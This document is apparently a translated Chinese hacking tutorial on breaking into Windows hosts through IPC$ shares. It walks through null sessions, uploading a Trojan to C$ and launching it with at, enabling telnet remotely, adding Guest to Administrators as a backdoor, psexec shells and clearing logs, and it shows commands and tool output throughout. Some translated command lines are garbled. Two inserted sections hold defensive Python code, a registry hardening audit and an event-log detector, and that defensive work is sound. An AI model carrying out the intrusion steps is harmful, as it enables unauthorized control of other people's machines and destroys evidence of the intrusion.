9. How to open IPC$ and other shares on the target

Opening IPC$ on the target is not that easy, or the world would be in chaos. You need a shell with admin privileges, such as Telnet or a Trojan, and then run net share ipc$ to open the target's IPC$; net share ipc$ /del closes the share again. If you want to share a folder, use for example net share baby=c:\ which shares the C drive under the share name baby.

10. Commands that can only be completed with a shell

I have seen many tutorials list commands that need a shell as if they could be run over a bare IPC$ connection, which misleads people about what an IPC$ connection can do. Here is a summary of the commands that must be completed in a shell:

1 Creating a user on the remote host, activating a user, changing a user's password, or adding a user to the administrators group all require a shell;

2 Opening the remote host's IPC$ share, default shares or ordinary shares requires a shell;

3 Starting or stopping a service on the remote host requires a shell;

4 Starting or killing a process on the remote host also requires a shell.

11. Commands that may be needed during the intrusion

Note whether each command applies to the local or to the remote host. Commands that are local can only be run against the remote host after you have obtained a shell on it.

1 Create a null connection: net use \\IP\ipc$ "" /user:""

2 Create a non-null connection: net use \\IP\ipc$ "psw" /user:"account"

3 View the remote host's shared resources (default shares are not shown): net view \\IP

4 View the local host's shared resources (local default shares are shown): net share

5 Obtain the remote host's NetBIOS name table (includes the logged-on user name): nbtstat -A IP

6 Obtain the list of users on the local host: net user

7 View the remote host's current time: net time \\IP

8 Display the services currently running on the local host: net start

9 Start or stop a local service: net start servicename and net stop servicename /y

10 Map a remote share: net use z: \\IP\baby maps the share named baby to drive Z

11 Delete a mapped share: net use z: /del removes the mapping of drive Z (other drive letters likewise); net use * /del /y removes all of them

12 Copy a file: copy <path>\srv.exe \\IP\<share name>, for example copy ccbirds.exe \\*.*.*.*\c$ copies the file from the current directory to the other side's C drive

13 Add a scheduled task remotely: at \\IP time program, for example at \\127.0.0.1 11:00 love.exe. Note: use 24-hour time; if the program sits in one of the system's default search paths (such as system32\) no path is needed, otherwise the path must be given

14 Open Telnet on the remote host. This uses a small program, OpenTelnet.exe, available from all the major download sites, and needs four things: 1) the target has the IPC$ share open; 2) you have the administrator account and password; 3) the target's RemoteRegistry service is running; 4) the target is WIN2K/XP (NT untested). Command format: OpenTelnet.exe \\server account psw NTLMAuthor telnetport. Example: c:\>opentelnet.exe \\*.*.*.* administrator "" 1 90

15 Activate users / joined administrators group 1 Net uesr account / activ: Yes 2 Net localgroup administrators account / add

16 Tight the Telnet of the remote host also require a small program: resumeTelnet.exe command format: ResumeTelNet.exe // Server Account PSW Examples are as follows: c: /> resumetelnet.exe //*.*.* Administrator ""

17 Delete a established IPC $ Connection NET USE // IP / IPC $ / DEL
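Every command in the list above depends on a handful of host settings that an administrator can turn off: anonymous (null-session) enumeration, the automatic C$/D$/ADMIN$ shares, and the RemoteRegistry, Task Scheduler and Telnet services. The following audit script is an added example, not code from the original post or its author. It parses the text that a registry export (as produced by reg export) contains and reports which of those conveniences are still enabled. The registry key paths and value names (RestrictAnonymous, AutoShareServer, AutoShareWks, the Start value of the RemoteRegistry, Schedule and TlntSvr services) are the real Windows ones; the export text embedded below is constructed sample data, not from any real host.

```python
"""Audit, from a .reg export, the settings the IPC$ command list relies on.

Added example (not from the original post). Registry paths and value names
are the real Windows ones; the two export fragments are constructed samples.
"""
import re

BASE = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"

# Services the post's tools need: OpenTelnet uses RemoteRegistry, "at" jobs
# use Schedule (Task Scheduler), "telnet ip 90" needs TlntSvr (Telnet).
SERVICES = {
    "RemoteRegistry": "remote registry edits (OpenTelnet) work",
    "Schedule": "remote at jobs run",
    "TlntSvr": "telnet logins are possible",
}
START = {2: "auto", 3: "manual", 4: "disabled"}

# Constructed export of a host left at the defaults the post exploits.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]
"Start"=dword:00000003
"""

# Constructed export of the same host after hardening.
HARDENED_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000000
"AutoShareWks"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]
"Start"=dword:00000004
"""


def parse_reg(text):
    """Return {key_path: {value_name: int}} for the dword values of a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
            if m:
                keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit_ipc_settings(text):
    """Return one finding string per setting that keeps the IPC$ tricks usable."""
    keys = parse_reg(text)
    findings = []

    # 0 allows the anonymous user/share enumeration the post describes;
    # non-zero restricts it (Windows XP and later add RestrictAnonymousSAM).
    lsa = keys.get(BASE + r"\Control\Lsa", {})
    if lsa.get("RestrictAnonymous", 0) == 0:
        findings.append("Lsa\\RestrictAnonymous is 0: null sessions may enumerate users and shares")

    # Absent values mean the default, which is to create the admin shares.
    params = keys.get(BASE + r"\Services\LanmanServer\Parameters", {})
    names = ("AutoShareServer", "AutoShareWks")
    for name in names:
        if params.get(name) == 1:
            findings.append(f"LanmanServer\\{name} is 1: C$, D$, ADMIN$ are created at boot")
    if not any(n in params for n in names):
        findings.append("AutoShareServer/AutoShareWks not set: default shares are on")

    for svc, effect in SERVICES.items():
        start = keys.get(rf"{BASE}\Services\{svc}", {}).get("Start")
        if start is not None and start != 4:
            findings.append(f"service {svc} start={START.get(start, start)}: {effect}")
    return findings


if __name__ == "__main__":
    for label, reg in (("default host", SAMPLE_REG), ("hardened host", HARDENED_REG)):
        print(f"== {label}: {len(audit_ipc_settings(reg))} finding(s)")
        for f in audit_ipc_settings(reg):
            print("  -", f)
```

Run it against a real export and the findings map one-to-one onto the items in the command list: clearing RestrictAnonymous blocks item 5, removing the auto-shares removes the C$ target of item 12, and disabling the three services stops items 13, 14 and the telnet login. Disabling Server-side sharing altogether is the stronger fix where the host does not need to share files at all.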

(This tutorial is not updated regularly; to get the latest version, please visit the official website: Cuisine Bird Community, original at http://ccbirds.yeah.net)

XII: The complete IPC$ intrusion procedure

In fact, the intrusion steps vary with personal preference; I will just describe the common ones, heh heh.

1 Search for hosts with scanning software such as Fluxay, SSS, X-Scan and so on, whichever you like, then lock onto a target. If you scan out a password with administrator privileges you can carry on with the steps below; suppose the Administrator password you obtained is empty.

2 At this point you have two roads to choose from: either open Telnet (command line) or give it a Trojan (graphical interface). Let's take the Telnet road first.

3 Don't forget the command for opening Telnet; use the small program OpenTelnet: c:\> opentelnet.exe \\192.168.21.* Administrator "" 1 90. If it returns the following output:

*********************************************************
Remote Telnet Configure, by refdom. Email: refdom@263.net
OpenTelnet.exe
Usage: OpenTelnet.exe \\server username password NTLMAuthor telnetport
*********************************************************
Connecting \\192.168.21.*... Successfully!
NOTICE!!!!!!
The telnet service default setting: NTLMAuthor=2 telnetport=23
Starting telnet service...
Telnet service is started successfully!
Telnet service is running!
BINGLE!!! Yeah!!
Telnet port is 90. You can try: "telnet ip 90", to connect the server!
Disconnecting server... Successfully!

* This means you have opened Telnet on port 90.

4 Now we telnet in: telnet 192.168.21.* 90. If it succeeds you get a shell on the remote host, and at this point you can control your broiler like your own machine. What to do? Add the Guest account to the administrators group, or leave a back door.

5 c:\> net user guest /active:yes * Activates the guest user (people often try the guest account); you can use net user guest to check whether "Account active" shows Yes or No.

6 c:\> net user guest 1234 * Changes the guest password to 1234, or to any password you like.

7 c:\> net localgroup administrators guest /add * Makes guest an Administrator, so that even if the administrator changes his password we can still log in with Guest. A reminder: because of security policy settings, remote access by Guest and other accounts may be prohibited; if that is the case our back door is wasted, may God bless everyone.

8 OK, now let's take the other road and give it a Trojan to play with.

9 First, establish the IPC$ connection: c:\> net use \\192.168.21.*\ipc$ "" /user:administrator

10 Since you want to upload something, you first have to know what it shares: c:\> net view \\192.168.21.*

Shared resources at \\192.168.21.*

Share name   Type   Used as  Comment
-------------------------------------------------------------------------------
C            Disk
D            Disk
The command completed successfully.

* OK, we see the other side shares the C and D disks, so we can copy files to either disk. Again, because the default shares cannot be seen with the net view command, we cannot tell whether the other side has default sharing open.

11 c:\> copy love.exe \\192.168.21.*\c
1 file(s) copied.
* This command uploads the Trojan client love.exe to the other side's C drive; of course, copying it into the system folder is best if you can, as it is not easy to discover there.

12 Before running the Trojan, let's look at its current time: c:\> net time \\192.168.21.*
Current time at \\192.168.21.* is 2003/8/22 11:00 AM
The command completed successfully.

13 Now run it with at. The other side must have the Task Scheduler service running (it lets programs run at a specified time), otherwise this will not work: c:\> at \\192.168.21.* 11:02 c:\love.exe
Added a new job with job ID = 1

14 The rest is waiting. At 11:02 you can connect with the control client; if it succeeds you can control the remote host through the graphical interface. If the connection fails, the target may be inside a local area network, the program may have been killed by a firewall, or the host may be offline (not that likely); whatever the case, you have to give up.

Well, that covers the two basic methods. Once you are comfortable with them you can use more efficient routines, such as cloning the Guest account with CA, or using psexec with the command psexec \\targetip -u user -p password cmd.exe to get a shell, and so on; all of these work, it's up to you. But don't forget to clean your logs; you can use Gongge's elsave.exe.
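Every step of the procedure above, from the null session in item 9 through the at job, the Guest changes and the log cleaning, leaves a Windows event behind, and the events of one session share the logon ID that the 4624 logon event assigns. The script below is an added example, not code from the original post or its author: it correlates constructed sample event records by logon ID and raises an alert per session, covering the command list (null connection, admin-share upload, remote at job), the intrusion steps (Guest enabled and added to Administrators) and the closing remarks (psexec-style service installation and log clearing). The Event IDs (4624, 5140, 4698, 4722, 4732, 7045, 1102), logon type 3 and the ANONYMOUS LOGON account name are the real Windows values; the records, IP addresses, logon IDs and field names are constructed for this example.

```python
"""Correlate Windows events into the IPC$ intrusion chain described in the post.

Added example (not from the original post). The records are constructed;
the Event IDs and field semantics are the real Windows Security (and
System, for 7045) log values:
  4624 type 3 as ANONYMOUS LOGON  -> null session  (net use \\ip\ipc$ "" /user:"")
  5140 share \\*\IPC$ / \\*\C$    -> share access / upload to an admin share
  4698                            -> scheduled task created (at \\ip 11:02 ...)
  4722 / 4732 Administrators      -> account enabled / added to Administrators
  7045                            -> service installed (psexec-style execution)
  1102                            -> audit log cleared
"""

ADMIN_SHARES = ("IPC$", "C$", "D$", "ADMIN$")
SEVERE = {"scheduled_task", "admin_group_add", "service_installed", "log_cleared"}

# Constructed sample records (dict form of the event fields, not a real log).
EVENTS = [
    {"id": 4624, "logon_id": "0x3e7a", "logon_type": 3, "user": "ANONYMOUS LOGON", "src": "192.168.21.10"},
    {"id": 5140, "logon_id": "0x3e7a", "user": "ANONYMOUS LOGON", "share": r"\\*\IPC$"},
    {"id": 4624, "logon_id": "0x4f11", "logon_type": 3, "user": "Administrator", "src": "192.168.21.10"},
    {"id": 5140, "logon_id": "0x4f11", "user": "Administrator", "share": r"\\*\C$"},
    {"id": 4698, "logon_id": "0x4f11", "user": "Administrator", "task": r"\At1"},
    {"id": 4722, "logon_id": "0x4f11", "user": "Administrator", "target": "Guest"},
    {"id": 4732, "logon_id": "0x4f11", "user": "Administrator", "target": "Guest", "group": "Administrators"},
    {"id": 1102, "logon_id": "0x4f11", "user": "Administrator"},
    # A benign network logon that touches a normal share: must not alert.
    {"id": 4624, "logon_id": "0x5a20", "logon_type": 3, "user": "backup", "src": "10.0.0.5"},
    {"id": 5140, "logon_id": "0x5a20", "user": "backup", "share": r"\\*\Public"},
]


def classify(ev):
    """Map one event to a stage of the chain, or None if it is not interesting."""
    i = ev["id"]
    if i == 4624 and ev.get("logon_type") == 3 and ev.get("user") == "ANONYMOUS LOGON":
        return "null_session"
    if i == 5140 and ev.get("share", "").upper().endswith(ADMIN_SHARES):
        return "admin_share"
    if i == 4698:
        return "scheduled_task"
    if i == 4722:
        return "account_enabled"
    if i == 4732 and ev.get("group") == "Administrators":
        return "admin_group_add"
    if i == 7045:
        return "service_installed"
    if i == 1102:
        return "log_cleared"
    return None


def correlate(events):
    """Group chain stages per logon session; return alerts, most severe first."""
    sessions = {}
    for ev in events:
        s = sessions.setdefault(ev["logon_id"], {"user": ev.get("user", "?"), "src": "?", "stages": set()})
        if ev["id"] == 4624:          # only the logon event carries the source address
            s["src"] = ev.get("src", "?")
        stage = classify(ev)
        if stage:
            s["stages"].add(stage)

    alerts = []
    for lid, s in sessions.items():
        if not s["stages"]:
            continue
        if s["stages"] & SEVERE:
            severity = "high"
        elif len(s["stages"]) >= 2:   # e.g. null session followed by IPC$ access
            severity = "medium"
        else:
            severity = "low"
        alerts.append({"severity": severity, "logon_id": lid, "user": s["user"],
                       "src": s["src"], "stages": sorted(s["stages"])})
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(alerts, key=lambda a: order[a["severity"]])


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f'{a["severity"]:6} {a["src"]:15} {a["user"]:16} {", ".join(a["stages"])}')
```

Keying on the logon ID rather than on the source address matters because 4698, 4722, 4732 and 1102 record the acting account and its logon ID but not the client IP; the 4624 event supplies the address once and the correlation carries it to the rest of the session. A 1102 event in a session that already hit earlier stages is the strongest signal here, since clearing the log is the last step the post recommends.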
